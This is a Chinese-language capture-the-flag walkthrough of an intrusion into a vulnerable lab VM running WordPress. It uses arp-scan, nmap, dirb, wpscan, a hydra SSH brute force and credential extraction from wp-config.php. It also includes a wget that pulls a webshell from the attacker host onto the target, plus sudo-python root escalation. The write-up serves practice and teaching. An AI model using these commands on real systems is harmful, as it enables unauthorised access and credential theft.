測試機:192.168.223.34
target:192.168.223.131
目標:拿flag和拿管理員權限
一
探測存活主機:arp-scan -l
二
端口探測(nmap爲例)
然後我們發現有開啓了ssh服務
還有http服務
三
掃描敏感目錄
dirb http://192.168.223.131
四
其中通過訪問vendor目錄發現PHPMailerAutoload.php文件,查詢發現是CVE-2016-10033是PHPMailer中存在的高危安全漏洞,攻擊者只需要巧妙的構造出一個惡意郵箱地址,即可寫入任意文件,造成遠程命令執行的危害(見方法三)
五
我們再來查看首頁
發現有幾個分頁面
六
通過全部訪問查看後,終有在service.html查看源碼中發現flag
flag1{b9bbcb33e11b80be759c4e844862482d}
拿到第 1 個flag
七
之前我們在第四步的時候發現wordpress目錄,
所以我們使用wpscan工具來掃描
wpscan 是一個掃描WordPress漏洞的黑盒子掃描器,可以掃描出wordpress的版本,主題,插件,後臺用戶以及爆破後臺用戶密碼等
wpscan --url http://192.168.223.131/wordpress -e u vp
-e 枚舉方式
u id爲1-10用戶名
vp 掃描脆弱插件
發現2個用戶
八
使用hydra工具對其進行ssh爆破
hydra -l michael -P /root/123.txt ssh://192.168.223.131
-l 指定用戶名
-P 指定密碼字典
破解出密碼:“michael”(em…我其實沒破解出來)
九
我們登陸這個賬號試試
⑩
之前我們爆破wordpress的時候,發現有2個用戶,那麼現在我們來看下這2個用戶的權限
cat /etc/passwd
發現是2個低權限玩家,噗
11
查詢到 /var/www 目錄下 存放這flag2.txt
拿到第2個flag
12 提權(方法一)
由於我們現在是低權限玩家,沒啥作用
所以,我們現在來提權,變成高端玩家,才能搞事情(滑稽)
看一下進程
netstat -a
發現是本地數據庫
下載一個工具,來收集mysql信息
wget https://www.securitysift.com/download/linuxprivchecker.py
然後執行,看可以收集到那些信息
python linuxprivchecker.py
通過這個工具收集到的信息,
我們可以知道mysql有user defined function(用戶自定義函數)也就是UDF
通過她,我們可以知道mysql是root權限,因爲必須是root權限(主要是得創建和拋棄自定義函數)
才能創建UDF(自定義mysql函數)
如果不知道啥意思,可以翻譯一下,
上面說到可以用UDF提權,
UDF提權可以參考: https://www.exploit-db.com/exploits/1518/
這個網址就是之前工具收集到的
提權(方法二)
在wordpress目錄下,上馬
切換到wordpress目錄下,測試機開啓http服務
然後靶機去下載測試機上的大馬
wget http://192.168.223.34/cao.php
查看wp-config.php的內容即可找到mysql的用戶名和密碼
cat wp-config.php
查看數據庫,
發現默認數據庫,
選擇默認數據庫,
查看錶
查看wp-posts表
select * from wp-posts;
成功拿到flag3和flag4
感覺有點不對,不是應該拿到root權限後纔會找到flag4嘛。
13
同時我們查詢所有表後,在wp-users表中發現steven的hash值
破解出來爲pink84。
13 登錄另一個賬號:steven
感覺有點不對,不是應該拿到root權限後纔會找到flag4嘛。
flag4畢竟是偷的雞,所以就當沒有獲得flag4,
因此提權,一種方法我在方法一已經大致描述過了。
現在我們來登錄:steven
查看一下
查看當前用戶的權限
sudo -l
可以發現python直接繞過root
利用sudo和python直接繞過root。
成功提權
最後flag4也拿到了
參考鏈接:https://www.anquanke.com/post/id/163996
https://www.cnblogs.com/bmjoker/p/10034001.html